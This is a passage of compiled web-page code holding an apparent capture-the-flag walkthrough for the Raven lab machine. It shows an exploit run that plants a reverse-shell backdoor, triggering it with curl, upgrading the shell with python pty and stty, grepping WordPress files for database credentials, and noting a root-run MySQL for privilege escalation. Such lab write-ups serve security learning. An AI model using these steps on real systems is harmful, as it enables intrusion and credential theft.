\"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"The last prompt will print only if that last get request to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"target + backdoor\"), \" which stands for \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"http://raven.local/ + hello.php\"), \" had an HTTP status code equals to 200.\"), mdx(\"p\", null, \"Now, procced to detonate this exploit:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ python3 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"40974\"), \".py\"))), mdx(\"p\", null, \"Exploitation prompt:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/75609/raven-111855.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACQUlEQVQoz6WRWU/bQBCA/QesIFWo2AhK4iNxSgjOZSckcZLNBQKcBsgBSxFCraigUAKUq0QUinjoof7geKZaB1ARVFXVh0+zO6v5ZnaXM63is+l6a6Vab9Pp+jIt201athu0XGvS0nyDzjdWqd16Te3WmguZXaDFuUVafdXuU2/TSq1FV99srXw4PH7OjY55ScxIYdRIoh5LYNyccmE5YyqLVqGEaavgkkxnMZXJuflowrwnkjDdMz0StbmEkSJbOwe4f9TtLTVpb7dz4uwdfnJ2OidOm647S80VZ+PttrO53XHe7x056xvvnM7Hc4cUK87oyIgjy3JPlqSe1+vFwcFBm5u1F8nx+TVe3vyE7uVXuPjyHbpX3+C0ewObWx1oLq/B7v4ZHJ1dwefrH7DTOYWD4wuoLTRhbOwF+AMBUFXVUVUVRVG0OZ9PInokilkrD1aOQMbKYzqTw+RUBkmpisXyNJYqM+6aFCtYnZlDw0zheCiEiqKgqqpMCGwtCILNiaJIIpEYxs0khPUIxKIxnAxPomGYqGkaBjTtYQz0oyzLTMakD4Ven0QMM4llqwC5dBaMbAHj6TymLIKpdBZDExOoBYOugBXdcSt7LBweHiaaFkRd0yAcDIJ/QsegHsdAKIwvx0Nu4VP8Jn0oHBoaIqy7pCggyTIosgSy5OtHtleUv8I+5V4oCAJhnfz9ztCfwP/HyZ4A7upEUayxCfOSJLlvxCa6jf+CexPmEARhjuN5nh8YGMh4PJ7c/8AcPM97fgEfqFWDTc/2tgAAAABJRU5ErkJggg==')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"exploitation\",\n \"title\": \"exploitation\",\n \"src\": \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/fcda8/raven-111855.png\",\n \"srcSet\": [\"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/12f09/raven-111855.png 148w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/e4a3f/raven-111855.png 295w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/fcda8/raven-111855.png 590w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/efc66/raven-111855.png 885w\", \"/static/25c95dc1bed4b0d7ee28eb4afc6016e4/75609/raven-111855.png 994w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Great, now I have successfully planted a reverse shell backdoor at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"http://raven.local/hello.php\"), \".\"), mdx(\"h2\", null, \"Get shell\"), mdx(\"p\", null, \"Now visit this backdoor endpoint:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"curl\"), \" -I -X GET http://raven.local/hello.php\"))), mdx(\"p\", null, \"Unsurprisingly, I have an interactive shell pop out from netcat handler.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/a0f9c6dad9b92709d5cfa4c37d616940/00d43/raven-194601.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAABWElEQVQoz72Ry07CQBSGu6d0YySFlk1npkPCAiOtvYEpFgQSwEKjqEx0wc5HcOHCx9ZOj2kpSgCjxMTFl/9cki8nOYLZ7hz542jhjyIWjCJ2MZqx3uSa9ae37DKcZzmZP7KILdkwus/6wfTui9kd613dLBbLp4fnl1dZQJgE46APw+4AWp0e+EEf3LYPhuWAaXtgWG5W2147y+aZvcOpaYF37oNp2aFQrVaDltsCx3Ji07Riy3K4YZi80TjhzaaRZb1e54QQjjSNI7RDjBF6Q5oGpdJxKCiKGuiUAiYkITm6rie6TldQmtRqtYRSms/3ElNKQVXVUJBlOSCEwMYS0n4f612aa/IDMqGiKKFQLpc/hSQXfse27GfhagmH8O9CTjae81u2hd1Dr9oDz4XT9Ms+QohjjDlCKE7rQ8EYv2OMoVKpjIVCoSBKkmQXi0XvL0iS5IqiKH0A+As07hAHBhgAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"shell\",\n \"title\": \"shell\",\n \"src\": \"/static/a0f9c6dad9b92709d5cfa4c37d616940/fcda8/raven-194601.png\",\n \"srcSet\": [\"/static/a0f9c6dad9b92709d5cfa4c37d616940/12f09/raven-194601.png 148w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/e4a3f/raven-194601.png 295w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/fcda8/raven-194601.png 590w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/efc66/raven-194601.png 885w\", \"/static/a0f9c6dad9b92709d5cfa4c37d616940/00d43/raven-194601.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Although it\\u2019s a shell, I can\\u2019t use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"c\"), \" to abort an execution from this shell, it will terminate my netcat program. I still need to upgrade it into a fully functional shell.\"), mdx(\"p\", null, \"Firstly, take advantage of python interpreter to spawn a bash shell:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ python -c \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"import pty;pty.spawn('/bin/bash')\\\"\")))), mdx(\"p\", null, \"Secondly, hit \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"z\"), \" bring it to background job.\"), mdx(\"p\", null, \"Then:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ stty raw -echo\"))), mdx(\"p\", null, \"And finally, hit \", mdx(\"kbd\", null, \"fg\"), \" and \", mdx(\"kbd\", null, \"Enter\"), \" to bring netcat back to foreground with a fully functional shell.\"), mdx(\"p\", null, \"Futhermore, set terminator environment variable:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"export\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token assign-left variable\"\n }), mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token environment constant\"\n }), \"TERM\")), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"xterm\"))), mdx(\"p\", null, \"Now, I\\u2019m able use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"c\"), \" to abort execution inside compromised machine, or \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"l\"), \" to clear the terminal screen.\"), mdx(\"p\", null, \"Listing current folder:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/00d43/raven-210408.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACV0lEQVQoz3WSXVPTQBiFeyEIUjIDjIBtaZnms4lt02Q3u8nmo21aRAX5UkakesOdP8ELL/zZ2t3X2aWCDnhx5p1sZp4957xbQazYmhxfXI/fns8mx+9n03cf1Dw4uVR6dfZxdnT5eXYxu5m9ufikvg/Pru51fjWbnlxeX998/fLt+4/diml3ytH0NUwOj4AVY0iLEvLRFOJsCDQtAJEESJICZRmEUQxhRB8owARYPgRM6Gml2WyWLM0hYdl8EIRzz/N4v+9zx3E4Qpj7vs+DIOSWaXJdb3O93b6d95obuv5Tb7dhe/u5BLZKmqTg+wOBMBH9vi9CFImO64q8GAtCE8HSXBSjUtAkFa7nCdM0hWVZf2tu2zY0Go3Tyt5es4xIDAoUYtHt9mAwCMFxOpBmBeCIQpykSjgi6tw0TbAsS2kBV8B6vX5aabZaZcJyGAShwBERQYAgIhQkOMtHQGgi6wBZiz8IoNO5B8r5AHjrkEKv76vIEiDdBCFauLp1KKESaJrGnbtHHbb298ssH0KIsMCYqMgS5jgO5MMxyDqkO0JjcF3vztl/gdKhdNHr9eUyeBAigSMqwSJhmZAX0ZgpIRQJ27bvliLnY8CJjBOGWHUnnah4/kB1KOPK5YzLA0CYgGH8G3khvgCeVVqt/SGhCacx4/IdyjcYIswdp8O7vT73vJe82+3Jf9x1Xa7rOjcMQ80/Mgzjl7yoVqsdVzY3t6rbO7v0Ra3OdnZ2Wa3eYI29JtvY2GDLy0tsdXWVraw8ZctLT9ja2jOmaRpbX19/IE3Tkmq1qv0GZ4tGpUIvSKkAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"files\",\n \"title\": \"files\",\n \"src\": \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/fcda8/raven-210408.png\",\n \"srcSet\": [\"/static/8371f4fc115d53cf7fd04ad67f7ee42f/12f09/raven-210408.png 148w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/e4a3f/raven-210408.png 295w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/fcda8/raven-210408.png 590w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/efc66/raven-210408.png 885w\", \"/static/8371f4fc115d53cf7fd04ad67f7ee42f/00d43/raven-210408.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Based on this output, I can spot several interesting files and folders worth to check out. The first one is \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"Security - Doc\"), \" folder which indicates there is another endpoint \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"http://raven.local/Security - Doc\"), \". While turns out it\\u2019s a static documentation page.\"), mdx(\"p\", null, \"Then, the second one is \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"wordpress\"), \" folder which presumably contains some juicy credentials for database, etc.\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"grep\"), \" -ri db_password wordpress/\"))), mdx(\"p\", null, \"Database password spotted:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/189e72683940ee1d332fe103a1b14ac8/00d43/raven-214446.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACc0lEQVQoz2VSXVPaQBRNx04dR+BBCyqgQgIJFQj52nxtQgJBtO2o4CiDY9qXvvUn9KEP/dktu7dzV0VtH87cezfZs2fPWYnEo93p1e392WyZTy5u8unVIp9c3uY4jz9fi7Xz+TK/WOSiP5sv8/P53TOu7/LTq8X9/bfvX3/8/LUvyS01i9IM/CgBmozXlfgU0sk5xKMJjKcfYfrpUsy2G4Dt+q9gEQ/oMAXi+TPpsH6YuV4Auj5YWZa96na7zDBMpqptFsUJI8RjfhAyzwuYZTlMU1WmyE2mKPITVi1F+a3IMlQq5Zl0dHScBWEEpmlz4voCfkC5YVo8ilPu+SEPoyGP4oSbls07nQ9cVdV/sdI0Der1OhIeZZ4fgmGYnBCPE9cDP6BgmBaENAbi+oAHYq/rA2i1WqCqKrTb7ae6JqzVajPp+LiRRXECtk24Qzze7+tgWQ50Oh0YopeuD2E0BLQFv2la5yXZ/4T1w8PMIR7+zG3H5Q5xwfMDGAwMoQpnVPzU40Yke4HXhOghjRNUIPxznAcCVEOjoSBHslE2Bct2oNlsimu/AG+328+EjUYzi4YpXg/DYBhISGMRBnE9UYMwEkHhgei1rg94X9d5r9/nvV6fa5q2QrUPHjYak3E2hWSUwWh8KpTEyQiyyZlQiCHh2mL5Ba5v7iBJMxESWnJy0oVut4s2sEeFcwwlRWVBGDHi+ivPD0WPb84wLfEmcW2YjFk0TFmvrzNVVZksy2soivIHr1+tVi+knZ3dQmVvzz+o1uj7cpmWyxW6f1Cl29vb9O3GBt3cfEffSBKVHrG1tUWLxQItlUprFItFrGGhUCj9BTvTS2WnCbipAAAAAElFTkSuQmCC')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"password\",\n \"title\": \"password\",\n \"src\": \"/static/189e72683940ee1d332fe103a1b14ac8/fcda8/raven-214446.png\",\n \"srcSet\": [\"/static/189e72683940ee1d332fe103a1b14ac8/12f09/raven-214446.png 148w\", \"/static/189e72683940ee1d332fe103a1b14ac8/e4a3f/raven-214446.png 295w\", \"/static/189e72683940ee1d332fe103a1b14ac8/fcda8/raven-214446.png 590w\", \"/static/189e72683940ee1d332fe103a1b14ac8/efc66/raven-214446.png 885w\", \"/static/189e72683940ee1d332fe103a1b14ac8/00d43/raven-214446.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"grep\"), \" -ri db_user wordpress/\"))), mdx(\"p\", null, \"Database user spotted:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/fd6e459e9cc9a709a0bc621ef6436852/00d43/reven-215308.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACdklEQVQoz12SS0/bQBRGTVG7CCYLaALkoaR2XuA4cWKPX+O34zS0TQkUgRBpN931J3TRRX92m5lb3RFKCYujGY+tM9+91xIJ0uP51e3jfHW/zpe36+zjjQD3+acv69nydr24vl9/vvu6xm8W1w+73Dysi6u7x8fvP779/PX7VFK7vTxMZ+AFMQRJDmmxgLS4hDAtIM7nEKUFZPMPUFwuIYhzmBIHTNsD03a34BmNEiCOu5KazWbuuD6Mx8bGsshmMpkyQhymaUPm05ARYjPXo8xxfabrOlMVhanqDpuOqv5RFQWq1cpKarXaOQ0imJoWJ8ThhjHhFrG5pg15FGfcdlxOg4g7rsdHozEfDAa81+u9ZNPv96HRaKykRqOZW8SG4VAXIos4gIlHYwM8PwB853oUgjABYrvQ7Xah1+s9Zyus1+srqdVu51GcQRDG3HY8lArReGyAT0MhwwqSdIZVgKoqQvqMF8JWOw+jBKI45R4NOUpQiBJMZDuuEOOleIbpTYvAZGLC2Jgg2IYNpt0mTLMC4iTncTrjmCSMU5HIpyjwwHY8sdIwFpehEBN1Oh2Ed7vd/wnb7Xc59gcHgFMNooSHUfI0CJ+7HuV+EPEwTjmxXW5aRAxH10d8qOsce9/v93cSzrLZHOI0hyQrBNiCbPZelIfl5sUCjMlUPAdRIkrVtKHgQtMwLXtKeI09TPA/8/yAEdvd4P+G+6lpsdHIYBaxmWnZ7Pz8gg31ERsMzpmqqkxRlC2qqv7F8mu12lI6OjqWqycn7lmtTt9WKrRSqdLTsxo9OCjRN29e0/39V3RvT6KyLNNSqSTWcrm8w+HhIa6+LMvlf297TcnCiijoAAAAAElFTkSuQmCC')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"user\",\n \"title\": \"user\",\n \"src\": \"/static/fd6e459e9cc9a709a0bc621ef6436852/fcda8/reven-215308.png\",\n \"srcSet\": [\"/static/fd6e459e9cc9a709a0bc621ef6436852/12f09/reven-215308.png 148w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/e4a3f/reven-215308.png 295w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/fcda8/reven-215308.png 590w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/efc66/reven-215308.png 885w\", \"/static/fd6e459e9cc9a709a0bc621ef6436852/00d43/reven-215308.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Now that I have obtained database credentials I write them down into my Cherrytree notebook to keep all the information that I needed for future privilege escalation organized.\"), mdx(\"p\", null, \"Run \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ps\"), \" to make sure that there is some type of database currently running in this compromised system:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"ps\"), \" -ef \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"grep\"), \" sql\\nroot \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"551\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), \" 05:41 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe\\nroot \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"926\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"551\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), \" 05:41 ? 00:00:04 /usr/sbin/mysqld --basedir\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/usr --datadir\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/var/lib/mysql --plugin-dir\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/usr/lib/mysql/plugin --user\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"root --log-error\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/var/log/mysql/error.log --pid-file\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/var/run/mysqld/mysqld.pid --socket\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \"/var/run/mysqld/mysqld.sock --port\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"330\")))), mdx(\"p\", null, \"Run \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"netstat\"), \" to asertain which interface this MySQL instance is listening:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"netstat\"), \" -anotp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"grep\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"3306\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"Not all processes could be identified, non-owned process info\\n will not be shown, you would have to be root to see it all.\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\ntcp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"127.0\"), \".0.1:3306 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0.0\"), \".0.0:* LISTEN - off \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0.00\"), \"/0/0\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\")))), mdx(\"p\", null, \"In short, the conclusion is there is a MySQL instance running at port 3306 and listening at the localhost. And most importantly, it\\u2019s run by root, which indicates a crucial privesc 